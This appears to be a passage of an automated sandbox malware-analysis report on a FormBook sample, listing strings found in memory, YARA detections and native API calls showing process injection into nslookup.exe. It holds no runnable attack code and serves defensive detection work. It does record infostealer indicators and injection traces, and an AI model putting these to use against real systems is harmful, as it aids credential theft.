Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp, A4mmSHCUi2.exe, 00000000.00000002.1680016256.0000000005B44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.hover.com/home?source=parked
Source: nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: nslookup.exe, 0000000B.00000002.4107199032.0000000002F69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: nslookup.exe, 0000000B.00000002.4107199032.0000000002F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: nslookup.exe, 0000000B.00000002.4107199032.0000000002F69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: nslookup.exe, 0000000B.00000002.4107199032.0000000002F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: nslookup.exe, 0000000B.00000002.4107199032.0000000002F69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: nslookup.exe, 0000000B.00000002.4107199032.0000000002F69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: nslookup.exe, 0000000B.00000003.2165986822.0000000007F08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand=
Source: nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://twitter.com/hover
Source: nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: nslookup.exe, 0000000B.00000003.2173820297.0000000007F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/?source=parked
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/about?source=parked
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domain_pricing?source=parked
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domains/results
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/email?source=parked
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/privacy?source=parked
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew?source=parked
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tools?source=parked
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tos?source=parked
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/transfer_in?source=parked
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/hover_domains
Source: nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land
Source: nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_lan
Source: nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land_h
Source: nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/sozdanie-saita/
Source: nslookup.exe, 0000000B.00000002.4109044096.00000000047DC000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.marketplacer.top&reg_source=parking_auto

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.2.A4mmSHCUi2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.A4mmSHCUi2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4108291981.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4110076229.0000000005580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4108473621.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1984553272.00000000016A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1984164195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1991690472.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4108199784.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_0042C473 NtClose,	5_2_0042C473
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2B60 NtClose,LdrInitializeThunk,	5_2_01BF2B60
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_01BF2DF0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_01BF2C70
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF35C0 NtCreateMutant,LdrInitializeThunk,	5_2_01BF35C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF4340 NtSetContextThread,	5_2_01BF4340
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF4650 NtSuspendThread,	5_2_01BF4650
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2BA0 NtEnumerateValueKey,	5_2_01BF2BA0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2B80 NtQueryInformationFile,	5_2_01BF2B80
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2BF0 NtAllocateVirtualMemory,	5_2_01BF2BF0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2BE0 NtQueryValueKey,	5_2_01BF2BE0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2AB0 NtWaitForSingleObject,	5_2_01BF2AB0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2AF0 NtWriteFile,	5_2_01BF2AF0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2AD0 NtReadFile,	5_2_01BF2AD0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2DB0 NtEnumerateKey,	5_2_01BF2DB0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2DD0 NtDelayExecution,	5_2_01BF2DD0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2D30 NtUnmapViewOfSection,	5_2_01BF2D30
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2D10 NtMapViewOfSection,	5_2_01BF2D10
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2D00 NtSetInformationFile,	5_2_01BF2D00
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2CA0 NtQueryInformationToken,	5_2_01BF2CA0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2CF0 NtOpenProcess,	5_2_01BF2CF0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2CC0 NtQueryVirtualMemory,	5_2_01BF2CC0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2C00 NtQueryInformationProcess,	5_2_01BF2C00
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2C60 NtCreateKey,	5_2_01BF2C60
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2FB0 NtResumeThread,	5_2_01BF2FB0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2FA0 NtQuerySection,	5_2_01BF2FA0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2F90 NtProtectVirtualMemory,	5_2_01BF2F90
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2FE0 NtCreateFile,	5_2_01BF2FE0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2F30 NtCreateSection,	5_2_01BF2F30
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2F60 NtCreateProcessEx,	5_2_01BF2F60
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2EA0 NtAdjustPrivilegesToken,	5_2_01BF2EA0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2E80 NtReadVirtualMemory,	5_2_01BF2E80
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2EE0 NtQueueApcThread,	5_2_01BF2EE0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2E30 NtWriteVirtualMemory,	5_2_01BF2E30
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF3090 NtSetValueKey,	5_2_01BF3090
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF3010 NtOpenDirectoryObject,	5_2_01BF3010
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF39B0 NtGetContextThread,	5_2_01BF39B0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF3D10 NtOpenProcessToken,	5_2_01BF3D10
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF3D70 NtOpenThread,	5_2_01BF3D70
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F4340 NtSetContextThread,LdrInitializeThunk,	11_2_037F4340
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F4650 NtSuspendThread,LdrInitializeThunk,	11_2_037F4650
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2B60 NtClose,LdrInitializeThunk,	11_2_037F2B60
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2AF0 NtWriteFile,LdrInitializeThunk,	11_2_037F2AF0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2AD0 NtReadFile,LdrInitializeThunk,	11_2_037F2AD0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2F30 NtCreateSection,LdrInitializeThunk,	11_2_037F2F30
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2FE0 NtCreateFile,LdrInitializeThunk,	11_2_037F2FE0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2FB0 NtResumeThread,LdrInitializeThunk,	11_2_037F2FB0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2EE0 NtQueueApcThread,LdrInitializeThunk,	11_2_037F2EE0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2D30 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_037F2D30
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2D10 NtMapViewOfSection,LdrInitializeThunk,	11_2_037F2D10
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_037F2DF0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2DD0 NtDelayExecution,LdrInitializeThunk,	11_2_037F2DD0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_037F2C70
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2C60 NtCreateKey,LdrInitializeThunk,	11_2_037F2C60
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2CA0 NtQueryInformationToken,LdrInitializeThunk,	11_2_037F2CA0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F35C0 NtCreateMutant,LdrInitializeThunk,	11_2_037F35C0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F39B0 NtGetContextThread,LdrInitializeThunk,	11_2_037F39B0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2BF0 NtAllocateVirtualMemory,	11_2_037F2BF0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2BE0 NtQueryValueKey,	11_2_037F2BE0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2BA0 NtEnumerateValueKey,	11_2_037F2BA0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2B80 NtQueryInformationFile,	11_2_037F2B80
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2AB0 NtWaitForSingleObject,	11_2_037F2AB0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2F60 NtCreateProcessEx,	11_2_037F2F60
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2FA0 NtQuerySection,	11_2_037F2FA0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2F90 NtProtectVirtualMemory,	11_2_037F2F90
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2E30 NtWriteVirtualMemory,	11_2_037F2E30
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2EA0 NtAdjustPrivilegesToken,	11_2_037F2EA0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2E80 NtReadVirtualMemory,	11_2_037F2E80
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2D00 NtSetInformationFile,	11_2_037F2D00
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2DB0 NtEnumerateKey,	11_2_037F2DB0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2C00 NtQueryInformationProcess,	11_2_037F2C00
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2CF0 NtOpenProcess,	11_2_037F2CF0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F2CC0 NtQueryVirtualMemory,	11_2_037F2CC0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F3010 NtOpenDirectoryObject,	11_2_037F3010
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F3090 NtSetValueKey,	11_2_037F3090
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F3D70 NtOpenThread,	11_2_037F3D70
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F3D10 NtOpenProcessToken,	11_2_037F3D10
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EC8EE0 NtCreateFile,	11_2_02EC8EE0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EC9050 NtReadFile,	11_2_02EC9050
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EC91E0 NtClose,	11_2_02EC91E0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EC9140 NtDeleteFile,	11_2_02EC9140
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0363FB75 NtResumeThread,	11_2_0363FB75
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0363F943 NtUnmapViewOfSection,	11_2_0363F943

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_028CDD7C	0_2_028CDD7C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_073746E8	0_2_073746E8
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_0737B360	0_2_0737B360
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_0737A090	0_2_0737A090
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_0737D668	0_2_0737D668
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_0737E508	0_2_0737E508
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_0737E4F8	0_2_0737E4F8
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_0737B350	0_2_0737B350
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_0737E278	0_2_0737E278
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_0737E268	0_2_0737E268
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_0737A06E	0_2_0737A06E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_0737A050	0_2_0737A050
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_07374BD3	0_2_07374BD3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_0762B668	0_2_0762B668
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_07629490	0_2_07629490
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_07624E70	0_2_07624E70
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_076256E0	0_2_076256E0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_07629480	0_2_07629480
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_07627249	0_2_07627249
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_07627258	0_2_07627258
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_076252A8	0_2_076252A8
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_07620953	0_2_07620953
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 0_2_07626980	0_2_07626980
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_00418493	5_2_00418493
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_0040E033	5_2_0040E033
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_004018AD	5_2_004018AD
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_00401160	5_2_00401160
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_0042EA53	5_2_0042EA53
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_00401AFD	5_2_00401AFD
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_00402340	5_2_00402340
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_00402B40	5_2_00402B40
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_00401B00	5_2_00401B00
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_0040FD93	5_2_0040FD93
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_004166CE	5_2_004166CE
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_004166D3	5_2_004166D3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_00402760	5_2_00402760
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_00402FF0	5_2_00402FF0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_0040FFB3	5_2_0040FFB3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C781CC	5_2_01C781CC
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C801AA	5_2_01C801AA
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C741A2	5_2_01C741A2
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C48158	5_2_01C48158
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB0100	5_2_01BB0100
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5A118	5_2_01C5A118
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C52000	5_2_01C52000
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C803E6	5_2_01C803E6
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BCE3F0	5_2_01BCE3F0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7A352	5_2_01C7A352
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C402C0	5_2_01C402C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60274	5_2_01C60274
